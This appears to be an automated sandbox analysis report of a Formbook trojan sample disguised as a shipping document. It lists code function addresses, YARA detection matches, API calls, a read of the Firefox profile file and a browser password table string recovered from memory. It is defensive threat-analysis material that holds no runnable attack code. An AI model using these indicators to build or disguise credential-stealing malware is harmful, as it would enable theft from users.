Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00446753	1_2_00446753
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FA352	1_2_030FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E3F0	1_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031003E6	1_2_031003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C02C0	1_2_030C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03030100	1_2_03030100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DA118	1_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C8158	1_2_030C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F41A2	1_2_030F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031001AA	1_2_031001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F81CC	1_2_030F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D2000	1_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03064750	1_2_03064750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303C7C0	1_2_0303C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305C6E0	1_2_0305C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040535	1_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03100591	1_2_03100591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E4420	1_2_030E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F2446	1_2_030F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EE4F6	1_2_030EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FAB40	1_2_030FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F6BD7	1_2_030F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303EA80	1_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03056962	1_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0310A9A6	1_2_0310A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304A840	1_2_0304A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03042840	1_2_03042840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030268B8	1_2_030268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E8F0	1_2_0306E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03082F28	1_2_03082F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03060F30	1_2_03060F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E2F30	1_2_030E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B4F40	1_2_030B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BEFA0	1_2_030BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03032FC8	1_2_03032FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FEE26	1_2_030FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040E59	1_2_03040E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03052E90	1_2_03052E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FCE93	1_2_030FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FEEDB	1_2_030FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304AD00	1_2_0304AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DCD1F	1_2_030DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03058DBF	1_2_03058DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303ADE0	1_2_0303ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040C00	1_2_03040C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0CB5	1_2_030E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03030CF2	1_2_03030CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F132D	1_2_030F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302D34C	1_2_0302D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0308739A	1_2_0308739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030452A0	1_2_030452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305B2C0	1_2_0305B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E12ED	1_2_030E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305D2F0	1_2_0305D2F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0307516C	1_2_0307516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F172	1_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0310B16B	1_2_0310B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304B1B0	1_2_0304B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EF0CC	1_2_030EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030470C0	1_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F70E9	1_2_030F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FF0E0	1_2_030FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FF7B0	1_2_030FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03085630	1_2_03085630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F16CC	1_2_030F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F7571	1_2_030F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DD5B0	1_2_030DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031095C3	1_2_031095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FF43F	1_2_030FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03031460	1_2_03031460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FFB76	1_2_030FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305FB80	1_2_0305FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B5BF0	1_2_030B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0307DBF9	1_2_0307DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FFA49	1_2_030FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F7A46	1_2_030F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B3A6C	1_2_030B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DDAAC	1_2_030DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03085AA0	1_2_03085AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E1AA3	1_2_030E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EDAC6	1_2_030EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D5910	1_2_030D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03049950	1_2_03049950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305B950	1_2_0305B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AD800	1_2_030AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030438E0	1_2_030438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FFF09	1_2_030FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03041F92	1_2_03041F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FFFB1	1_2_030FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03003FD2	1_2_03003FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03003FD5	1_2_03003FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03049EB0	1_2_03049EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03043D40	1_2_03043D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F1D5A	1_2_030F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F7D73	1_2_030F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305FDC0	1_2_0305FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B9C32	1_2_030B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FFCF2	1_2_030FFCF2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D5B2C0	6_2_02D5B2C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D5D2F0	6_2_02D5D2F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DE12ED	6_2_02DE12ED
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D452A0	6_2_02D452A0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DE0274	6_2_02DE0274
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02E003E6	6_2_02E003E6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D4E3F0	6_2_02D4E3F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D8739A	6_2_02D8739A
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DFA352	6_2_02DFA352
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D2D34C	6_2_02D2D34C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DF132D	6_2_02DF132D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DEF0CC	6_2_02DEF0CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D470C0	6_2_02D470C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DF70E9	6_2_02DF70E9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DFF0E0	6_2_02DFF0E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DF81CC	6_2_02DF81CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02E001AA	6_2_02E001AA
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D4B1B0	6_2_02D4B1B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02E0B16B	6_2_02E0B16B
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D2F172	6_2_02D2F172
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D7516C	6_2_02D7516C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DDA118	6_2_02DDA118
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D30100	6_2_02D30100
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DF16CC	6_2_02DF16CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D5C6E0	6_2_02D5C6E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D3C7C0	6_2_02D3C7C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DFF7B0	6_2_02DFF7B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D64750	6_2_02D64750
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D40770	6_2_02D40770
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DEE4F6	6_2_02DEE4F6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DF2446	6_2_02DF2446
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D31460	6_2_02D31460
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DFF43F	6_2_02DFF43F
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DDD5B0	6_2_02DDD5B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02E00591	6_2_02E00591
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DF7571	6_2_02DF7571
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D40535	6_2_02D40535
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DEDAC6	6_2_02DEDAC6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D3EA80	6_2_02D3EA80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DDDAAC	6_2_02DDDAAC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D85AA0	6_2_02D85AA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DFFA49	6_2_02DFFA49
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DF7A46	6_2_02DF7A46
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DB3A6C	6_2_02DB3A6C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DF6BD7	6_2_02DF6BD7
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D7DBF9	6_2_02D7DBF9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D5FB80	6_2_02D5FB80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DFAB40	6_2_02DFAB40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DFFB76	6_2_02DFFB76
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D6E8F0	6_2_02D6E8F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D438E0	6_2_02D438E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D268B8	6_2_02D268B8
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D42840	6_2_02D42840
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D4A840	6_2_02D4A840
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DAD800	6_2_02DAD800
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02E0A9A6	6_2_02E0A9A6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D429A0	6_2_02D429A0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D49950	6_2_02D49950
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D5B950	6_2_02D5B950
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D56962	6_2_02D56962
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DFEEDB	6_2_02DFEEDB
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D52E90	6_2_02D52E90
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DFCE93	6_2_02DFCE93
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D49EB0	6_2_02D49EB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D40E59	6_2_02D40E59
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DFEE26	6_2_02DFEE26
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D32FC8	6_2_02D32FC8
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D41F92	6_2_02D41F92
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DFFFB1	6_2_02DFFFB1
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DB4F40	6_2_02DB4F40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DFFF09	6_2_02DFFF09
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D60F30	6_2_02D60F30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D82F28	6_2_02D82F28
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D30CF2	6_2_02D30CF2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DFFCF2	6_2_02DFFCF2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DE0CB5	6_2_02DE0CB5
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D40C00	6_2_02D40C00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DB9C32	6_2_02DB9C32
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D5FDC0	6_2_02D5FDC0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D3ADE0	6_2_02D3ADE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D58DBF	6_2_02D58DBF
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DF1D5A	6_2_02DF1D5A
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D43D40	6_2_02D43D40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02DF7D73	6_2_02DF7D73
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D4AD00	6_2_02D4AD00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_00121810	6_2_00121810
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_0012309B	6_2_0012309B
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_001230A0	6_2_001230A0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_0013B420	6_2_0013B420
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_0011C760	6_2_0011C760
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_0011C980	6_2_0011C980
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_0011AA00	6_2_0011AA00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_00124EC0	6_2_00124EC0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02A5E2E8	6_2_02A5E2E8
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02A5E7A8	6_2_02A5E7A8
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02A5E403	6_2_02A5E403
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02A5D808	6_2_02A5D808

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 030AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0302B970 appears 262 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 030BF290 appears 103 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03075130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03087E54 appears 107 times
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: String function: 000B0A30 appears 46 times
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: String function: 000AF9F2 appears 31 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 02D75130 appears 36 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 02DBF290 appears 103 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 02DAEA12 appears 84 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 02D2B970 appears 248 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 02D87E54 appears 85 times

Source: Shipping report#Cargo Handling.exe, 00000000.00000003.1877606684.00000000041DD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Shipping report#Cargo Handling.exe
Source: Shipping report#Cargo Handling.exe, 00000000.00000003.1877895194.0000000004033000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Shipping report#Cargo Handling.exe

Source: Shipping report#Cargo Handling.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 1.2.svchost.exe.430000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.svchost.exe.430000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3125347091.0000000004B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.3123749348.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.3122938454.00000000006F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.2347774622.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.2347410534.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.2347100196.0000000000430000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.3122693034.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3123748800.0000000004C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@6/4

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

Code function: 0_2_001037B5 GetLastError,FormatMessageW,

0_2_001037B5

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_000F10BF AdjustTokenPrivileges,CloseHandle,		0_2_000F10BF
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_000F16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_000F16C3

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

Code function: 0_2_001051CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_001051CD

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

Code function: 0_2_0011A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0011A67C

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

Code function: 0_2_0010648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0010648E

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

Code function: 0_2_000942A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_000942A2

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

File created: C:\Users\user\AppData\Local\Temp\finitism

Jump to behavior

Source: Shipping report#Cargo Handling.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: netbtugc.exe, 00000006.00000002.3123044826.0000000000826000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2580649632.0000000000826000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2580462851.0000000000805000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Shipping report#Cargo Handling.exe	ReversingLabs: Detection: 55%
Source: Shipping report#Cargo Handling.exe	Virustotal: Detection: 35%

